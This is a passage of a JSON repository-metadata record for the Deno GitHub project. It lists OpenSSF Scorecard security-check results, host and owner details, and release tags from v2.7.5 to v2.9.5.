.github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.